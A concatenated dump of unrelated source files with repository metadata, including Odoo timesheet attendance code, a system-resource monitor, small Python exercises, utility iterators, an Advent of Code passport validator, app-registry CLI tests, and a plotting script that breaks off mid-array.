sheet_obj = self.pool['hr_timesheet_sheet.sheet']
if not date:
date = time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
att_tz_date_str = self._get_attendance_employee_tz(
cr, uid, employee_id,
date=date, context=context)
sheet_ids = sheet_obj.search(cr, uid,
[('date_from', '<=', att_tz_date_str),
('date_to', '>=', att_tz_date_str),
('employee_id', '=', employee_id)],
limit=1, context=context)
return sheet_ids and sheet_ids[0] or False
def _sheet(self, cursor, user, ids, name, args, context=None):
res = {}.fromkeys(ids, False)
for attendance in self.browse(cursor, user, ids, context=context):
res[attendance.id] = self._get_current_sheet(
cursor, user, attendance.employee_id.id, attendance.name,
context=context)
return res
_columns = {
'sheet_id': fields.function(_sheet, string='Sheet',
type='many2one', relation='hr_timesheet_sheet.sheet',
store={
'hr_timesheet_sheet.sheet': (_get_hr_timesheet_sheet, ['employee_id', 'date_from', 'date_to'], 10),
'hr.attendance': (lambda self,cr,uid,ids,context=None: ids, ['employee_id', 'name', 'day'], 10),
},
)
}
_defaults = {
'name': _get_default_date,
}
def create(self, cr, uid, vals, context=None):
if context is None:
context = {}
sheet_id = context.get('sheet_id') or self._get_current_sheet(cr, uid, vals.get('employee_id'), vals.get('name'), context=context)
if sheet_id:
att_tz_date_str = self._get_attendance_employee_tz(
cr, uid, vals.get('employee_id'),
date=vals.get('name'), context=context)
ts = self.pool.get('hr_timesheet_sheet.sheet').browse(cr, uid, sheet_id, context=context)
if ts.state not in ('draft', 'new'):
raise osv.except_osv(_('Error!'), _('You can not enter an attendance in a submitted timesheet. Ask your manager to reset it before adding attendance.'))
elif ts.date_from > att_tz_date_str or ts.date_to < att_tz_date_str:
raise osv.except_osv(_('User Error!'), _('You can not enter an attendance date outside the current timesheet dates.'))
return super(hr_attendance,self).create(cr, uid, vals, context=context)
def unlink(self, cr, uid, ids, *args, **kwargs):
if isinstance(ids, (int, long)):
ids = [ids]
self._check(cr, uid, ids)
return super(hr_attendance,self).unlink(cr, uid, ids,*args, **kwargs)
def write(self, cr, uid, ids, vals, context=None):
if context is None:
context = {}
if isinstance(ids, (int, long)):
ids = [ids]
self._check(cr, uid, ids)
res = super(hr_attendance,self).write(cr, uid, ids, vals, context=context)
if 'sheet_id' in context:
for attendance in self.browse(cr, uid, ids, context=context):
if context['sheet_id'] != attendance.sheet_id.id:
raise osv.except_osv(_('User Error!'), _('You cannot enter an attendance ' \
'date outside the current timesheet dates.'))
return res
def _check(self, cr, uid, ids):
for att in self.browse(cr, uid, ids):
if att.sheet_id and att.sheet_id.state not in ('draft', 'new'):
raise osv.except_osv(_('Error!'), _('You cannot modify an entry in a confirmed timesheet'))
return True
hr_attendance()
class hr_timesheet_sheet_sheet_day(osv.osv):
_name = "hr_timesheet_sheet.sheet.day"
_description = "Timesheets by Period"
_auto = False
_order='name'
_columns = {
'name': fields.date('Date', readonly=True),
'sheet_id': fields.many2one('hr_timesheet_sheet.sheet', 'Sheet', readonly=True, select="1"),
'total_timesheet': fields.float('Total Timesheet', readonly=True),
'total_attendance': fields.float('Attendance', readonly=True),
'total_difference': fields.float('Difference', readonly=True),
}
def init(self, cr):
cr.execute("""create or replace view hr_timesheet_sheet_sheet_day as
SELECT
id,
name,
sheet_id,
total_timesheet,
total_attendance,
cast(round(cast(total_attendance - total_timesheet as Numeric),2) as Double Precision) AS total_difference
FROM
((
SELECT
MAX(id) as id,
name,
sheet_id,
SUM(total_timesheet) as total_timesheet,
CASE WHEN SUM(total_attendance) < 0
THEN (SUM(total_attendance) +
CASE WHEN current_date <> name
THEN 1440
ELSE (EXTRACT(hour FROM current_time AT TIME ZONE 'UTC') * 60) + EXTRACT(minute FROM current_time AT TIME ZONE 'UTC')
END
)
ELSE SUM(total_attendance)
END /60 as total_attendance
FROM
((
select
min(hrt.id) as id,
l.date::date as name,
s.id as sheet_id,
sum(l.unit_amount) as total_timesheet,
0.0 as total_attendance
from
hr_analytic_timesheet hrt
JOIN account_analytic_line l ON l.id = hrt.line_id
LEFT JOIN hr_timesheet_sheet_sheet s ON s.id = hrt.sheet_id
group by l.date::date, s.id
) union (
select
-min(a.id) as id,
a.name::date as name,
s.id as sheet_id,
0.0 as total_timesheet,
SUM(((EXTRACT(hour FROM a.name) * 60) + EXTRACT(minute FROM a.name)) * (CASE WHEN a.action = 'sign_in' THEN -1 ELSE 1 END)) as total_attendance
from
hr_attendance a
LEFT JOIN hr_timesheet_sheet_sheet s
ON s.id = a.sheet_id
WHERE action in ('sign_in', 'sign_out')
group by a.name::date, s.id
)) AS foo
GROUP BY name, sheet_id
)) AS bar""")
hr_timesheet_sheet_sheet_day()
class hr_timesheet_sheet_sheet_account(osv.osv):
_name = "hr_timesheet_sheet.sheet.account"
_description = "Timesheets by Period"
_auto = False
_order='name'
_columns = {
'name': fields.many2one('account.analytic.account', 'Project / Analytic Account', readonly=True),
'sheet_id': fields.many2one('hr_timesheet_sheet.sheet', 'Sheet', readonly=True),
'total': fields.float('Total Time', digits=(16,2), readonly=True),
'invoice_rate': fields.many2one('hr_timesheet_invoice.factor', 'Invoice rate', readonly=True),
}
def init(self, cr):
cr.execute("""create or replace view hr_timesheet_sheet_sheet_account as (
select
min(hrt.id) as id,
l.account_id as name,
s.id as sheet_id,
sum(l.unit_amount) as total,
l.to_invoice as invoice_rate
from
hr_analytic_timesheet hrt
left join (account_analytic_line l
LEFT JOIN hr_timesheet_sheet_sheet s
ON (s.date_to >= l.date
AND s.date_from <= l.date
AND s.user_id = l.user_id))
on (l.id = hrt.line_id)
group by l.account_id, s.id, l.to_invoice
)""")
hr_timesheet_sheet_sheet_account()
class res_company(osv.osv):
_inherit = 'res.company'
_columns = {
'timesheet_range': fields.selection(
[('day','Day'),('week','Week'),('month','Month')], 'Timesheet range',
help="Periodicity on which you validate your timesheets."),
'timesheet_max_difference': fields.float('Timesheet allowed difference(Hours)',
help="Allowed difference in hours between the sign in/out and the timesheet " \
"computation for one sheet. Set this to 0 if you do not want any control."),
}
_defaults = {
'timesheet_range': lambda *args: 'week',
'timesheet_max_difference': lambda *args: 0.0
}
res_company()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| 50.580286 | 290 | 0.58595 |
5d7b30ee6755513b630ed79ce0ddd64d0708b094 | 1,125 | py | Python | main.py | rajat004/py_watch | 4b39d0d6d5084efb04492c38ada3063b837803c3 | [
"MIT"
] | null | null | null | main.py | rajat004/py_watch | 4b39d0d6d5084efb04492c38ada3063b837803c3 | [
"MIT"
] | null | null | null | main.py | rajat004/py_watch | 4b39d0d6d5084efb04492c38ada3063b837803c3 | [
"MIT"
] | null | null | null | from activity_monitor.cpu import CpuMonitor
from activity_monitor.memory import MemoryMonitor
from config import CPUConstants, MemConstants, ActivityNames, REST_INTERVAL
import time
from datetime import datetime
from core.notification import Notification
import logging
logger = logging.getLogger(__name__)
def service():
cpu_monitor = CpuMonitor(threshold_low=CPUConstants.low.value, threshold_high=CPUConstants.high.value,
activity_name=ActivityNames.cpu.value, current_value=0)
mem_monitor = MemoryMonitor(threshold_low=MemConstants.low.value, threshold_high=MemConstants.high.value,
activity_name=ActivityNames.memory.value, current_value=0)
while(True):
logger.info('sleeping at {0} !'.format(datetime.now()))
time.sleep(REST_INTERVAL)
logger.info('woke up at {0} !'.format(datetime.now()))
cpu_activity = cpu_monitor.monitor_activity()
mem_activity = mem_monitor.monitor_activity()
Notification.send_notifications([mem_activity, cpu_activity])
if __name__ == '__main__':
service()
| 32.142857 | 109 | 0.728 |
1c1fff7fca4bd41bd722972474c9e2dc15665428 | 616 | py | Python | algo-c-to-_/examples/horner_.py | nobi56/aRepo | 4d444647ceedd239a1bc37bfa31ba8f204fca0ef | [
"CC0-1.0"
] | null | null | null | algo-c-to-_/examples/horner_.py | nobi56/aRepo | 4d444647ceedd239a1bc37bfa31ba8f204fca0ef | [
"CC0-1.0"
] | null | null | null | algo-c-to-_/examples/horner_.py | nobi56/aRepo | 4d444647ceedd239a1bc37bfa31ba8f204fca0ef | [
"CC0-1.0"
] | null | null | null | #
# from src/horner.c
#
# double horner(int, double a[], double) to horner
#
from horner import horner
def fmt(a):
assert len(a) > 0, "ERROR: 'a' must be a list/tuple that contains at least one element."
r = []
for i in range(len(a)-1, 1, -1):
r.append("{0} * x^{1}".format(a[i], i))
if len(a) >= 2:
r.append("{0} * x".format(a[1]))
r.append(str(a[0]))
return "f(x) = {0}".format(" + ".join(r))
a = (1, 2, 3, 4, 5)
print(fmt(a))
print("f({0}) = {1}".format(2, horner(a,2)))
print("f({0}) = {1}".format(11, horner(a,11)))
print("f({0}) = {1}".format(121, horner(a,121)))
| 23.692308 | 92 | 0.527597 |
20c1cfaa3bd5cc9e9c68592774b6e25f3c1ef0c9 | 450 | py | Python | __pythonBuildSpecialString.py | simdevex/01.Basics | cf4f372384e66f4b26e4887d2f5d815a1f8e929c | [
"MIT"
] | null | null | null | __pythonBuildSpecialString.py | simdevex/01.Basics | cf4f372384e66f4b26e4887d2f5d815a1f8e929c | [
"MIT"
] | null | null | null | __pythonBuildSpecialString.py | simdevex/01.Basics | cf4f372384e66f4b26e4887d2f5d815a1f8e929c | [
"MIT"
] | null | null | null | '''
Python program to get a new string from a given string where"Is" has been added to the front.
If the given string already begins with"Is" then return the string unchanged
'''
def checkString (inputString =''):
if inputString[0:2] == "Is":
return inputString
else:
return "Is " + inputString
def main():
myString = input ("Please type a sentence: ")
print (checkString (myString))
main ()
| 23.684211 | 94 | 0.633333 |
509da87fe0bab7f407ba2c2300c36c1399352288 | 3,233 | py | Python | common/enumerable.py | GitKlip/python-common | b44d1aaba5db3e1aa571b189999a8edea54c96bb | [
"MIT"
] | null | null | null | common/enumerable.py | GitKlip/python-common | b44d1aaba5db3e1aa571b189999a8edea54c96bb | [
"MIT"
] | null | null | null | common/enumerable.py | GitKlip/python-common | b44d1aaba5db3e1aa571b189999a8edea54c96bb | [
"MIT"
] | null | null | null | from collections import defaultdict
from itertools import chain
from itertools import combinations
from itertools import islice
from itertools import tee
def group_by(func, values):
""" Groups values by func.
Returns
(dict): Keys produced by func pointing to lists of the values grouped.
"""
groups = defaultdict(list)
for value in values:
groups[func(value)].append(value)
return dict(groups)
def index_by(func, values):
""" Indexes values by func.
Returns
(dict): Keys produced by func, each pointing to one value.
"""
return {func(value): value for value in values}
def each_cons(size, iterable):
""" Moves a sliding window along the iterable and yields consecutive windows.
Example:
for window in each_cons(3, [1,2,3,4,5]):
print(chunk)
# output:
[1, 2, 3]
[2, 3, 4]
[3, 4, 5]
Taken from: https://stackoverflow.com/a/54110047/422075
"""
iterators = tee(iterable, size)
iterators = [islice(iterator, i, None) for i, iterator in enumerate(iterators)]
yield from zip(*iterators)
def each_slice(size, iterable):
""" Chunks the iterable into size elements at a time, each yielded as a list.
Example:
for chunk in each_slice(2, [1,2,3,4,5]):
print(chunk)
# output:
[1, 2]
[3, 4]
[5]
"""
current_slice = []
for item in iterable:
current_slice.append(item)
if len(current_slice) >= size:
yield current_slice
current_slice = []
if current_slice:
yield current_slice
def each_slice_or_size(iterable, max_len: int, max_bytes: float):
current_slice = []
for item in iterable:
if sys.getsizeof(current_slice) + sys.getsizeof(item) >= max_bytes:
yield current_slice
current_slice = []
current_slice.append(item)
if len(current_slice) >= max_len:
yield current_slice
current_slice = []
if current_slice:
yield current_slice
def all_combinations(iterable, min_size=1, max_size=None):
""" Returns combinations of all lengths up to the size of iterable.
Args:
iterable (iterable): Anything that can be turned into a list.
min_size (int): The min size of a combination.
max_size (int): The max size of a combination. If None, defaults to
len(list(iterable)).
Returns:
(iterator): An iterator returning all requested combinations.
Example:
iterator = all_combinations([1, 2, 3])
# output of list(iterator):
[(1,), (2,), (3,), (1, 2), (1, 3), (2, 3), (1, 2, 3)]
"""
min_size = max(min_size, 0)
as_list = list(iterable)
size = len(as_list)
max_size = size if max_size is None else max_size
max_size = min(size, max_size)
return chain.from_iterable(combinations(as_list, size) for size in range(min_size, max_size + 1))
def compact(iterable, generator=False):
""" Returns a list where all None values have been discarded. """
if generator:
return (val for val in iterable if val is not None)
else:
return [val for val in iterable if val is not None]
| 26.941667 | 101 | 0.628518 |
283fa3bacea06cb6cfdf18edb591b4b66af2ff8c | 3,619 | py | Python | 2020/04.py | MastProTech/Advent-of-Code | 3ffdb9b0cfcca72084cc8fd6e2e9a431443dd3dc | [
"MIT"
] | 1 | 2020-12-05T12:55:10.000Z | 2020-12-05T12:55:10.000Z | 2020/04.py | MastProTech/Advent-of-Code | 3ffdb9b0cfcca72084cc8fd6e2e9a431443dd3dc | [
"MIT"
] | null | null | null | 2020/04.py | MastProTech/Advent-of-Code | 3ffdb9b0cfcca72084cc8fd6e2e9a431443dd3dc | [
"MIT"
] | null | null | null | import re
from runner import read_file
def extract_keys_values(text:str)->list: # Seperates each passport, and then each passport's keys and values
t_list=re.split('\n{2}', text)
t_list=list(map(str.split, t_list))
output=list()
for i in range(len(t_list)):
output.append([])
for j in range(len(t_list[i])):
output[i].append(t_list[i][j].split(':'))
output[i]=dict(output[i])
return output
def return_passport_validity_part1(l:list)->bool:
i=l.keys()
if 'ecl' in i and 'pid' in i and 'eyr' in i and 'hcl' in i and 'byr' in i and 'iyr' in i and 'hgt' in i:
return True
return False
def verify(key:str, val:str)->bool: # Verifies if keys are assigned valid values or not
if key=='byr':
if int(val)>=1920 and int(val)<=2002:
return True
elif key=='iyr':
if int(val)>=2010 and int(val)<=2020:
return True
elif key=='eyr':
if int(val)>=2020 and int(val)<=2030:
return True
elif key=='hgt':
if val[-2:]=='cm':
if int(val[:-2])>=150 and int(val[:-2])<=193:
return True
elif val[-2:]=='in':
if int(val[:-2])>=59 and int(val[:-2])<=76:
return True
elif key=='hcl':
match=re.match('^#[0-9a-f]{6}$', val)
if match is not None:
return True
elif key=='ecl':
ecl=['amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth']
if val in ecl:
return True
elif key=='pid':
match=re.match('^[0-9]{9}$', val)
if match is not None:
return True
return False
def return_passport_validity_part2(l:list)->bool:
i=l.keys()
if (
('byr' in i and verify('byr', l['byr'])) and
('iyr' in i and verify('iyr', l['iyr'])) and
('eyr' in i and verify('eyr', l['eyr'])) and
('hgt' in i and verify('hgt', l['hgt'])) and
('hcl' in i and verify('hcl', l['hcl'])) and
('ecl' in i and verify('ecl', l['ecl'])) and
('pid' in i and verify('pid', l['pid']))):
return True
return False
def clone_part2(l:list)->bool: # NOTE: Copied code of this function. Source: https://www.reddit.com/r/adventofcode/comments/k6e8sw/2020_day_04_solutions/gemhjlu/
valid=False
fields_required={'byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid'}
field_pattern = {'byr': '(^(19)[2-9][0-9]$)|(^(200)[0-2]$)',
'iyr': '(^(201)[0-9]$)|(^(2020)$)',
'eyr': '(^(202)[0-9]$)|(^(2030)$)',
'hgt': '(^((1[5-8][0-9])|((19)[0-3]))cm$)|(^((59)|(6[0-9])|(7[0-6]))in$)',
'hcl': '^#[0-9a-f]{6}$',
'ecl': '(^amb$)|(^blu$)|(^brn$)|(^gry$)|(^grn$)|(^hzl$)|(^oth$)',
'pid': '^[0-9]{9}$',
'cid': '(.*?)'}
if fields_required.issubset(l.keys()):
valid=True
for key in l.keys():
valid=valid and bool(re.match(field_pattern[key], l[key]))
return valid
if __name__=='__main__':
text=read_file('04.txt')
output=extract_keys_values(text)
print('Total Passports:',len(output))
print('Part 1: Valid Passports:',list(map(return_passport_validity_part1, output)).count(True))
print('Part 2: Valid Passports:',list(map(return_passport_validity_part2, output)).count(True))
print('Part 2: (Using another function):',list(map(clone_part2, output)).count(True)) # One of the best solutions I found on the internet. ♥ Source: https://www.reddit.com/r/adventofcode/comments/k6e8sw/2020_day_04_solutions/gemhjlu/ | 41.125 | 237 | 0.539652 |
3bae9a7aa83d43f6d71f5b9fac9a97079f4b1c62 | 3,628 | py | Python | test/scloud/test_appreg.py | harsimranmaan/splunk-cloud-sdk-go | 24fbc60263a158ce57f7f467a95b725656950949 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | test/scloud/test_appreg.py | harsimranmaan/splunk-cloud-sdk-go | 24fbc60263a158ce57f7f467a95b725656950949 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | test/scloud/test_appreg.py | harsimranmaan/splunk-cloud-sdk-go | 24fbc60263a158ce57f7f467a95b725656950949 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | import unittest
import test
def appreg(*args):
return test.scloud("appreg", *args)
class TestAppregistry(unittest.TestCase):
def setUp(self):
# retrieve the selected tenant name
code, self.tname, _ = test.scloud("get", "tenant")
self.assertEqual(0, code)
self.assertIsNotNone(self.tname)
# delete apps/subscription in case a test fails in the middle
def tearDown(self):
appreg("delete-app", "scloudapptest")
appreg("delete-app", "scloudsubscription")
appreg("delete-subscription", "scloudsubscriptiontest")
appreg("delete-app", "scloudrotatesecrettest")
def test_create_get_delete_app(self):
appName = "scloudapptesting"
code, result, _ = appreg("create-app", appName, "web", "--redirect-urls", "https://redirect1.com", "--title",
"scloudapptitle")
self.assertEqual(0, code)
self.assertIsNotNone(result)
# Get-app-Tests
code, result, _ = appreg("get-app", appName)
self.assertEqual(0, code)
self.assertIsNotNone(result)
# List-all-app-Tests
code, result, _ = appreg("list-apps")
self.assertEqual(0, code)
self.assertIsNotNone(result)
# Update app
code, result, _ = appreg("update-app", appName, "--redirect-urls", "https://redirect2.com , https://mycompany.com", "--title",
"scloudapptitle")
self.assertEqual(0, code)
self.assertIsNotNone(result)
# Clean up
code, result, _ = appreg("delete-app", appName)
self.assertEqual(0, code)
def test_create_get_delete_subscription(self):
appName = "scloudsubscription"
# Create-app
code, result, _ = appreg("create-app", appName, "web", "--redirect-urls", "https://redirect1.com", "--title",
appName)
# Create-subscription-Tests
code, result, _ = appreg("create-subscription", appName)
self.assertEqual(0, code)
# Get-subscription-Tests
code, result, _ = appreg("get-subscription", appName)
self.assertEqual(0, code)
self.assertIsNotNone(result)
# Get-subscription-of Non-exist app Tests
code, result, _ = appreg("get-subscription", "nosuchapp")
self.assertEqual(1, code)
# List-all-subscriptions-Test
code, result, _ = appreg("list-subscriptions", "web")
self.assertEqual(0, code)
self.assertIsNotNone(result)
# Clean up
code, result, _ = appreg("delete-subscription", appName)
self.assertEqual(0, code)
code, result, _ = appreg("delete-app", appName)
self.assertEqual(0, code)
def test_rotate_secret(self):
appName = "scloudrotatesecret"
code, result, _ = appreg("create-app", appName, "web", "--redirect-urls", "https://redirect1.com", "--title",
appName)
self.assertEqual(0, code)
self.assertIsNotNone(result)
# rotate app secret
code, result, _ = appreg("rotate-secret", appName)
self.assertEqual(0, code)
self.assertIsNotNone(result)
# Clean up
code, result, _ = appreg("delete-app", appName)
self.assertEqual(0, code)
def test_get_spec_json(self):
code, result, _ = appreg("get-spec-json")
self.assertEqual(0, code)
self.assertTrue(result)
def test_get_spec_yaml(self):
code, result, _ = appreg("get-spec-yaml")
self.assertEqual(0, code)
self.assertTrue(result)
| 34.226415 | 134 | 0.599504 |
b39270499a1de4e402802dac367ca1d006653043 | 3,362 | py | Python | examples/question_answering/generate_data.py | Tufeiming/simpletransformers | d61ee86836a6c91ccb5e2fa2cd2cdeb9b0af40db | [
"Apache-2.0"
] | null | null | null | examples/question_answering/generate_data.py | Tufeiming/simpletransformers | d61ee86836a6c91ccb5e2fa2cd2cdeb9b0af40db | [
"Apache-2.0"
] | null | null | null | examples/question_answering/generate_data.py | Tufeiming/simpletransformers | d61ee86836a6c91ccb5e2fa2cd2cdeb9b0af40db | [
"Apache-2.0"
] | null | null | null | import json
def get_question(field, keyword_list, context):
if field == "budget_amount":
question = "预算金额"
elif field == "bid_amount":
question = "中标金额"
elif field == "party_a_name":
question = "采购人"
elif field == "party_a_contact":
question = "采购联系人"
elif field == "party_a_contact_number":
question = "采购联系电话"
elif field == "agency_name":
question = "代理机构"
elif field == "agency_contact":
question = "代理机构联系人"
elif field == "agency_contact_number":
question = "代理机构联系电话"
elif field == "party_b_name":
question = "中标人"
else:
question = ""
for keyword in keyword_list:
if keyword in context:
question = keyword
break
return question
def generate_example(input_text):
context = input_text
qas = []
# 预算金额
temp_field = "budget_amount"
temp_list = ['起拍价', '底价', '预算金额', '采购金额', '招标控制价', '投资额', '总预算', '采购预算价',
'采购资金', '最高限价', '控制价', '拦标价', '建安造价', '工程预算']
temp_question = get_question(temp_field, temp_list, context)
qas.append({"question": temp_question, "id": temp_field})
# 中标金额
temp_field = "bid_amount"
temp_list = ['中标金额', '成交金额', '预中标价格', '合同金额', '合同总金额', '中标价格',
'成交价格', '采购合同金额', '签约合同价', '成交价', '成交价合计', '成交价款',
'成交商家报价', '中标商家报价', '中选金额']
temp_question = get_question(temp_field, temp_list, context)
qas.append({"question": temp_question, "id": temp_field})
# 甲方名称
temp_field = "party_a_name"
temp_list = ['采购单位', '招标单位', '建设单位', '采购单位名称', '招标人名称', '招标人单位名称',
'采购人', '招标人', '发包人', '采购人名称']
temp_question = get_question(temp_field, temp_list, context)
qas.append({"question": temp_question, "id": temp_field})
# 甲方联系人
temp_field = "party_a_contact"
temp_list = ['采购', '招标']
temp_question = get_question(temp_field, temp_list, context) + "联系人"
qas.append({"question": temp_question, "id": temp_field})
# 甲方联系电话
temp_field = "party_a_contact_number"
temp_list = ['采购', '招标']
temp_question = get_question(temp_field, temp_list, context) + "联系电话"
qas.append({"question": temp_question, "id": temp_field})
# 代理机构名称
temp_field = "agency_name"
qas.append({"question": "代理机构", "id": temp_field})
# 代理机构联系人
temp_field = "agency_contact"
qas.append({"question": "代理机构联系人", "id": temp_field})
# 代理机构联系电话
temp_field = "agency_contact_number"
qas.append({"question": "代理机构联系电话", "id": temp_field})
# 乙方名称
temp_field = "party_b_name"
temp_list = ['乙方', '供应商', '中标单位', '中标公司', '成交单位',
'成交公司', '承包单位', '承包公司', '中标人', '成交人', '承包人']
temp_question = get_question(temp_field, temp_list, context)
qas.append({"question": temp_question, "id": temp_field})
return {
"qas": qas,
"context": context
}
if __name__ == '__main__':
text = "START项目名称和编号 西南财经大学智慧教室多媒体智能扩音设备采购项目(WZ201929) 采购人 西南财经大学" \
" 地址及联系方式 成都市温江区柳台大道555号028-87092439 评审小组 纪建国、钱彤、李科、胡芳、赵亮 中标商家名称 " \
"成都市创航科技有限公司 中标商家地址 成都市武侯区人民南路四段一号 中标商家报价 461800元 主要标的名称 智能扩音设备一:" \
"艾力特OS-704FC-A80台 智能扩音设备二:艾力特SPK-3E196台 智能扩音设备三:艾力特MS-D05080台;END"
data = generate_example(text)
print(json.dumps(data, ensure_ascii=False, indent=4))
| 32.960784 | 79 | 0.608269 |
e85162bc6f782a754ec6f1fc9fc5ab583c487a51 | 6,232 | py | Python | flexget/components/imdb/db.py | signe/Flexget | dfe92d03415aab8254c5cf4827e06ad13da10504 | [
"MIT"
] | null | null | null | flexget/components/imdb/db.py | signe/Flexget | dfe92d03415aab8254c5cf4827e06ad13da10504 | [
"MIT"
] | null | null | null | flexget/components/imdb/db.py | signe/Flexget | dfe92d03415aab8254c5cf4827e06ad13da10504 | [
"MIT"
] | null | null | null | from datetime import datetime, timedelta
from loguru import logger
from sqlalchemy import Boolean, Column, DateTime, Float, Integer, String, Table, Unicode
from sqlalchemy.orm import relation
from sqlalchemy.schema import ForeignKey, Index
from flexget import db_schema
from flexget.components.imdb.utils import extract_id
from flexget.db_schema import UpgradeImpossible
logger = logger.bind(name='imdb.db')
SCHEMA_VER = 9
Base = db_schema.versioned_base('imdb_lookup', SCHEMA_VER)
# association tables
genres_table = Table(
'imdb_movie_genres',
Base.metadata,
Column('movie_id', Integer, ForeignKey('imdb_movies.id')),
Column('genre_id', Integer, ForeignKey('imdb_genres.id')),
Index('ix_imdb_movie_genres', 'movie_id', 'genre_id'),
)
Base.register_table(genres_table)
actors_table = Table(
'imdb_movie_actors',
Base.metadata,
Column('movie_id', Integer, ForeignKey('imdb_movies.id')),
Column('actor_id', Integer, ForeignKey('imdb_actors.id')),
Index('ix_imdb_movie_actors', 'movie_id', 'actor_id'),
)
Base.register_table(actors_table)
directors_table = Table(
'imdb_movie_directors',
Base.metadata,
Column('movie_id', Integer, ForeignKey('imdb_movies.id')),
Column('director_id', Integer, ForeignKey('imdb_directors.id')),
Index('ix_imdb_movie_directors', 'movie_id', 'director_id'),
)
Base.register_table(directors_table)
writers_table = Table(
'imdb_movie_writers',
Base.metadata,
Column('movie_id', Integer, ForeignKey('imdb_movies.id')),
Column('writer_id', Integer, ForeignKey('imdb_writers.id')),
Index('ix_imdb_movie_writers', 'movie_id', 'writer_id'),
)
Base.register_table(writers_table)
class Movie(Base):
__tablename__ = 'imdb_movies'
id = Column(Integer, primary_key=True)
title = Column(Unicode)
original_title = Column(Unicode)
url = Column(String, index=True)
# many-to-many relations
genres = relation('Genre', secondary=genres_table, backref='movies')
actors = relation('Actor', secondary=actors_table, backref='movies')
directors = relation('Director', secondary=directors_table, backref='movies')
writers = relation('Writer', secondary=writers_table, backref='movies')
languages = relation('MovieLanguage', order_by='MovieLanguage.prominence')
score = Column(Float)
votes = Column(Integer)
meta_score = Column(Integer)
year = Column(Integer)
plot_outline = Column(Unicode)
mpaa_rating = Column(String, default='')
photo = Column(String)
# updated time, so we can grab new rating counts after 48 hours
# set a default, so existing data gets updated with a rating
updated = Column(DateTime)
@property
def imdb_id(self):
return extract_id(self.url)
@property
def expired(self):
"""
:return: True if movie details are considered to be expired, ie. need of update
"""
if self.updated is None:
logger.debug('updated is None: {}', self)
return True
refresh_interval = 2
if self.year:
# Make sure age is not negative
age = max((datetime.now().year - self.year), 0)
refresh_interval += age * 5
logger.debug('movie `{}` age {} expires in {} days', self.title, age, refresh_interval)
return self.updated < datetime.now() - timedelta(days=refresh_interval)
def __repr__(self):
return '<Movie(name=%s,votes=%s,year=%s)>' % (self.title, self.votes, self.year)
class MovieLanguage(Base):
__tablename__ = 'imdb_movie_languages'
movie_id = Column(Integer, ForeignKey('imdb_movies.id'), primary_key=True)
language_id = Column(Integer, ForeignKey('imdb_languages.id'), primary_key=True)
prominence = Column(Integer)
language = relation('Language')
def __init__(self, language, prominence=None):
self.language = language
self.prominence = prominence
class Language(Base):
__tablename__ = 'imdb_languages'
id = Column(Integer, primary_key=True)
name = Column(Unicode)
def __init__(self, name):
self.name = name
class Genre(Base):
__tablename__ = 'imdb_genres'
id = Column(Integer, primary_key=True)
name = Column(String)
def __init__(self, name):
self.name = name
class Actor(Base):
__tablename__ = 'imdb_actors'
id = Column(Integer, primary_key=True)
imdb_id = Column(String)
name = Column(Unicode)
def __init__(self, imdb_id, name=None):
self.imdb_id = imdb_id
self.name = name
class Director(Base):
__tablename__ = 'imdb_directors'
id = Column(Integer, primary_key=True)
imdb_id = Column(String)
name = Column(Unicode)
def __init__(self, imdb_id, name=None):
self.imdb_id = imdb_id
self.name = name
class Writer(Base):
__tablename__ = 'imdb_writers'
id = Column(Integer, primary_key=True)
imdb_id = Column(String)
name = Column(Unicode)
def __init__(self, imdb_id, name=None):
self.imdb_id = imdb_id
self.name = name
class SearchResult(Base):
__tablename__ = 'imdb_search'
id = Column(Integer, primary_key=True)
title = Column(Unicode, index=True)
url = Column(String)
fails = Column(Boolean, default=False)
queried = Column(DateTime)
@property
def imdb_id(self):
return extract_id(self.url)
def __init__(self, title, url=None):
self.title = title
self.url = url
self.queried = datetime.now()
def __repr__(self):
return '<SearchResult(title=%s,url=%s,fails=%s)>' % (self.title, self.url, self.fails)
@db_schema.upgrade('imdb_lookup')
def upgrade(ver, session):
# v5 We may have cached bad data due to imdb changes, just wipe everything. GitHub #697
# v6 The association tables were not cleared on the last upgrade, clear again. GitHub #714
# v7 Another layout change cached bad data. GitHub #729
# v8 Added writers to the DB Schema
# v9 Added Metacritic score exftraction/filtering
if ver is None or ver <= 8:
raise UpgradeImpossible(
'Resetting imdb_lookup caches because bad data may have been cached.'
)
return ver
| 29.535545 | 99 | 0.681483 |
a8d626e3a3009f41687b24ed927d4cc699be7fc6 | 3,327 | py | Python | scripts/plots/master/plot_nice_confusion_matrix.py | dslaborg/sleep-mice-tuebingen | 95208c327b06284658afe17bb3f4e95778f3f943 | [
"Apache-2.0"
] | null | null | null | scripts/plots/master/plot_nice_confusion_matrix.py | dslaborg/sleep-mice-tuebingen | 95208c327b06284658afe17bb3f4e95778f3f943 | [
"Apache-2.0"
] | null | null | null | scripts/plots/master/plot_nice_confusion_matrix.py | dslaborg/sleep-mice-tuebingen | 95208c327b06284658afe17bb3f4e95778f3f943 | [
"Apache-2.0"
] | null | null | null | from os.path import join, dirname
import numpy as np
import matplotlib.pyplot as plt
# values in confusion matrices in percent
cm_001 = np.array([[98.09, 0.32, 1.43, 0.02, 0.14, ],
[0.78, 94.20, 1.04, 3.92, 0.05, ],
[4.49, 0.52, 91.83, 2.91, 0.26, ],
[1.16, 20.23, 20.40, 58.04, 0.17, ],
[9.68, 2.15, 17.20, 0.00, 70.97, ]])
cmT_001 = np.array([[96.24, 2.81, 1.86, 0.47, 19.08, ],
[0.08, 87.49, 0.14, 8.75, 0.76, ],
[3.59, 3.69, 97.00, 49.94, 29.01, ],
[0.04, 5.92, 0.88, 40.84, 0.76, ],
[0.05, 0.10, 0.11, 0.00, 50.38, ]])
cm_001b = np.array([[97.51, 0.66, 1.50, 0.05, 0.28, ],
[0.68, 93.00, 1.78, 4.33, 0.21, ],
[5.23, 0.52, 90.75, 3.22, 0.28, ],
[0.66, 17.08, 23.55, 58.37, 0.33, ],
[6.45, 1.08, 16.13, 0.00, 76.34, ]])
cmT_001b = np.array([[95.69, 5.72, 1.96, 0.98, 30.18, ],
[0.07, 85.62, 0.25, 9.04, 2.37, ],
[4.19, 3.65, 96.66, 51.63, 24.26, ],
